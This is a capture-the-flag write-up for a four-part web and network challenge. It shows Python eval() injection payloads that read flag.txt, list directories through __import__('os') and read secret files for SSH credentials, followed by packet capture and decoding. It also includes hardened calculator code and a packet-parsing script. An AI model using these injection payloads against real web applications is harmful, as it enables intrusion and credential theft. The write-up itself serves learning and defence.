Advantageous Adventures
First Bloods :)
Managed to do up to AA-2 before I had to sleep as I had work the next day.
Woke up to solve AA-3 and AA-4!
AA 1
The page offers a bunch of math calculators. Testing some simple payloads revealed that the backend was using Python's eval() to generate the results.
Now, if we are going to read a flag, we are most probably going to be dealing with strings. If we are dealing with strings, one of the math operators is more useful than the others: the + operator is also the string concatenation operator in Python.
Using the simple payload val1=''&val2=open('flag.txt').read(), we can make the server return the contents of flag.txt.
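The root cause above is that operand strings reach eval() unchanged, so a string literal plus a call expression is accepted as "math". As an added example (not the challenge's app.py; all names are hypothetical), here is the same two-operand calculator evaluated through an AST whitelist instead: numeric literals, the arithmetic operators and unary sign are the only node types it will execute, so '' and open(...) are rejected before anything runs.

```python
import ast
import operator

# Added example (not the challenge's own app.py): a calculator backend that accepts
# two operand strings and an operator, the way the page describes, but evaluates
# them with an AST whitelist instead of eval().  Names below are hypothetical.

_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,
}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}
_MAX_EXPONENT = 1000  # keeps "9**9**9"-style inputs from pinning the CPU


def _eval_node(node):
    # Numeric literals only: strings such as '' are rejected, so there is nothing
    # to concatenate, and Call/Attribute/Name nodes (open, __import__, os) are never
    # executed because they simply are not in the whitelist.
    if isinstance(node, ast.Constant):
        if isinstance(node.value, (int, float)) and not isinstance(node.value, bool):
            return node.value
        raise ValueError(f"non-numeric literal: {node.value!r}")
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        left, right = _eval_node(node.left), _eval_node(node.right)
        if isinstance(node.op, ast.Pow) and abs(right) > _MAX_EXPONENT:
            raise ValueError("exponent too large")
        return _BIN_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def safe_eval(expr):
    """Evaluate an arithmetic expression without eval(); raise ValueError otherwise."""
    tree = ast.parse(expr, mode="eval")
    return _eval_node(tree.body)


def is_safe_expression(expr):
    """True if safe_eval accepts expr; used to show what the whitelist rejects."""
    try:
        safe_eval(expr)
        return True
    except (ValueError, SyntaxError):
        return False


ALLOWED_OPERATORS = {"+", "-", "*", "/", "%", "**"}


def calculate(val1, op, val2):
    """Hardened replacement for eval(val1 + op + val2)."""
    if op not in ALLOWED_OPERATORS:
        raise ValueError(f"unsupported operator: {op!r}")
    return safe_eval(f"({val1}){op}({val2})")


if __name__ == "__main__":
    print(calculate("10", "/", "4"))                    # 2.5
    print(is_safe_expression("''+open('flag.txt').read()"))  # False
```

Division by zero still raises ZeroDivisionError from the operator itself, which the web layer should turn into a 400 rather than a traceback. The whitelist approach generalises to any "evaluate user-supplied expression" feature: walk the tree and execute only node types you have explicitly listed, never the reverse (blocklisting names like open or import), because the attribute and dunder tricks that bypass blocklists are exactly what this challenge relies on.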
AA 2
Did you get what you needed from Advantageous Adventures 1? You'll need a username and password from the first challenge to proceed. I heard that the Advantageous Adventures team was using what you received to communicate on a low level. Can you figure out how they're talking?
All info for this challenge must be derived from Advantageous Adventures 1.
Solution
We can import the os module.
val1=''&val2=str(__import__('os').listdir())
The result: ['__pycache__', 'static', 'secret_script.py', 'secret_info', 'flag.txt', 'app.py', 'README.md', 'templates', 'Dockerfile']
The same trick reads secret_script.py (val1=''&val2=open('secret_script.py').read()), and likewise secret_info and app.py.
We can SSH into the server using the credentials obtained above: ssh user@chals1.umdctf.io -p 3001
We can use dumpcap to capture the network traffic.
Capture 2000+ packets on the WiFi interface: dumpcap -i wlo2 -P
After running secret_script.py, transfer out.pcap out using scp:
scp -P 3001 user@chals1.umdctf.io:/home/ubuntu/out.pcap .
Open in Wireshark, and we have our flag!
AA 3
In Wireshark, we can decrypt the wireless traffic with the WiFi password found previously. This reveals another flag hidden in the data of the subsequent packets.
AA 4
Shortly below the above flag, we can see lots of packets with repeated numbers, starting from 0000..., 1111..., 2222..., and so on. The number itself probably doesn't mean much - we're looking for a string. But the length (i.e. the number of repeated digits) varies for each packet. This could be one way to encode data.
In Wireshark: Export packets as JSON. Then we can run a script to extract the flag:
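The writeup's extraction script is not on the page, so the following is an added example (not the author's code). It works over a constructed stand-in for Wireshark's JSON export, where each packet's raw payload sits under _source.layers.data["data.data"] as colon-separated hex, filters for payloads that are a single repeated digit, and collects the run lengths. The mapping from run length to character is an assumption, labelled in the code: the page only says the length varies per packet.

```python
import json

# Added example (not the original writeup's script).  SAMPLE_EXPORT is constructed
# to look like Wireshark's "Export Packet Dissections -> As JSON" output, where each
# packet's payload appears under _source.layers.data["data.data"] as colon-separated
# hex.  The run-length-to-character mapping is an assumption: the writeup only
# says that the number of repeated digits varies from packet to packet.


def make_packet(payload):
    """Build one constructed packet record carrying the given raw payload bytes."""
    hex_payload = ":".join(f"{b:02x}" for b in payload)
    return {"_source": {"layers": {"data": {"data.data": hex_payload,
                                            "data.len": str(len(payload))}}}}


SAMPLE_EXPORT = json.dumps([
    make_packet(b"0" * 85),       # 85 repeated '0's
    make_packet(b"not a run"),    # unrelated packet, must be skipped
    make_packet(b"1" * 77),       # 77 repeated '1's
    make_packet(b"2" * 68),       # 68 repeated '2's
])


def repeated_digit_runs(export_json):
    """Yield (digit, run_length) for each packet whose payload is one repeated digit."""
    for pkt in json.loads(export_json):
        data = pkt.get("_source", {}).get("layers", {}).get("data", {}).get("data.data")
        if not data:
            continue  # no raw data layer (e.g. management/control frames)
        payload = bytes.fromhex(data.replace(":", ""))
        if payload and payload.isdigit() and len(set(payload)) == 1:
            yield chr(payload[0]), len(payload)


def decode_run_lengths(export_json):
    """Assumed encoding: each packet's run length is the ASCII code of one character."""
    return "".join(chr(length) for _, length in repeated_digit_runs(export_json))


if __name__ == "__main__":
    print(list(repeated_digit_runs(SAMPLE_EXPORT)))  # [('0', 85), ('1', 77), ('2', 68)]
    print(decode_run_lengths(SAMPLE_EXPORT))         # UMD
```

Against a real export, call decode_run_lengths(open("export.json").read()). If the result is not readable text, the assumption about the mapping is what to revisit: print the list from repeated_digit_runs and look for an offset or a different base before changing the filter. From a monitoring standpoint the same signal (a stream of frames whose payload is a single repeated byte and whose lengths vary) is a cheap anomaly to alert on, since legitimate traffic rarely looks like that.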